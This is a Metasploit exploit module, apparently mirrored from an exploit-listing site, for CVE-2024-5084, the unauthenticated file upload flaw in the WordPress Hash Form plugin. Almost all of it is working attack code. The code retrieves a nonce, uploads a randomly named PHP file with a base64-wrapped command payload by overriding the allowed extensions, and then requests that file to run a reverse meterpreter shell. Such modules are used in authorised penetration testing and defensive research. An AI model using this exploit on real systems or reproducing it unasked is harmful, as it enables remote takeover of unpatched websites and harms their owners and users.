Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT-MULTI-HTTP-WP_HASH_FORM_RCE-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Payload::Php
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Wordpress

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Hash Form Plugin RCE',
        'Description' => %q{
          The Hash Form โ€“ Drag & Drop Form Builder plugin for WordPress suffers from a critical vulnerability
          due to missing file type validation in the file_upload_action function. This vulnerability exists
          in all versions up to and including 1.1.0. Unauthenticated attackers can exploit this flaw to upload arbitrary
          files, including PHP scripts, to the server, potentially allowing for remote code execution on the affected
          WordPress site. This module targets multiple platforms by adapting payload delivery and execution based on the
          server environment.
        },
        'Author' => [
          'Francesco Carlucci', # Vulnerability discovery
          'Valentin Lobstein'   # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-5084'],
          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form/hash-form-drag-drop-form-builder-110-unauthenticated-arbitrary-file-upload-to-remote-code-execution'],
        ],
        'Platform' => ['php', 'unix', 'linux', 'win'],
        'Arch' => [ARCH_PHP, ARCH_CMD],
        'Targets' => [
          [
            'PHP In-Memory', {
              'Platform' => 'php',
              'Arch' => ARCH_PHP
              # tested with php/meterpreter/reverse_tcp
            }
          ],
          [
            'Unix/Linux Command Shell', {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD
              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
            }
          ],
          [
            'Windows Command Shell', {
              'Platform' => 'win',
              'Arch' => ARCH_CMD
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2024-05-23',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
      )
  end

  def check
    return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?

    plugin_check_code = check_plugin_version_from_readme('hash-form', '1.1.1')

    if plugin_check_code.code == CheckCode::Unknown.code
      return CheckCode::Unknown('Hash Form plugin does not appear to be installed.')
    end

    return CheckCode::Detected('Hash Form plugin is installed but the version is unknown.') if plugin_check_code.code == CheckCode::Detected.code

    plugin_version = plugin_check_code.details[:version]
    return CheckCode::Safe("Hash Form plugin is version: #{plugin_version}, which is not vulnerable.") unless plugin_check_code.code == CheckCode::Appears.code

    print_good("Detected Hash Form plugin version: #{plugin_version}")
    CheckCode::Appears
  end

  def exploit
    print_status('Attempting to retrieve nonce from the target...')
    nonce = get_nonce

    fail_with(Failure::NoTarget, 'Failed to retrieve the nonce necessary for file upload. The target may not be vulnerable or the Hash Form plugin might not be active.') unless nonce

    print_good("Nonce retrieved: #{nonce}")
    print_status('Uploading PHP payload using the retrieved nonce...')

    file_url = upload_php_file(nonce)
    fail_with(Failure::UnexpectedReply, 'Failed to upload the PHP payload. Check file permissions and server settings.') unless file_url

    print_good("PHP payload uploaded successfully to #{file_url}")
    trigger_payload(file_url)
  end

  def get_nonce
    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri,
      'vars_get' => {
        'action' => 'hashform_preview',
        'form' => 1
      }
    })

    return nil unless res && res.code == 200

    script_content = res.get_html_document.xpath('//script[@id="frontend-js-extra"]').text
    return nil unless script_content

    nonce_match = script_content.match(/"ajax_nounce":"([a-f0-9]+)"/)
    nonce_match ? nonce_match[1] : nil
  end

  def php_exec_cmd(encoded_payload)
    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)

    shell = <<-END_OF_PHP_CODE
      #{php_preamble(disabled_varname: dis)}
      $c = base64_decode("#{encoded_clean_payload}");
      #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
    END_OF_PHP_CODE

    return Rex::Text.compress(shell)
  end

  def upload_php_file(nonce)
    file_content = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
    file_name = "#{Rex::Text.rand_text_alpha_lower(8)}.php"

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'ctype' => 'application/octet-stream',
      'vars_get' => {
        'action' => 'hashform_file_upload_action',
        'file_uploader_nonce' => nonce,
        'allowedExtensions[0]' => 'php',
        'sizeLimit' => 1048576,
        'qqfile' => file_name
      },
      'data' => file_content
    })

    if res && res.code == 200
      json_response = res.get_json_document
      return json_response['url'] if json_response && json_response['url']
    end
    nil
  end

  def trigger_payload(url)
    print_status('Triggering the payload...')
    uri = URI.parse(url)
    send_request_cgi({
      'method' => 'GET',
      'uri' => uri.path
    })
  end
end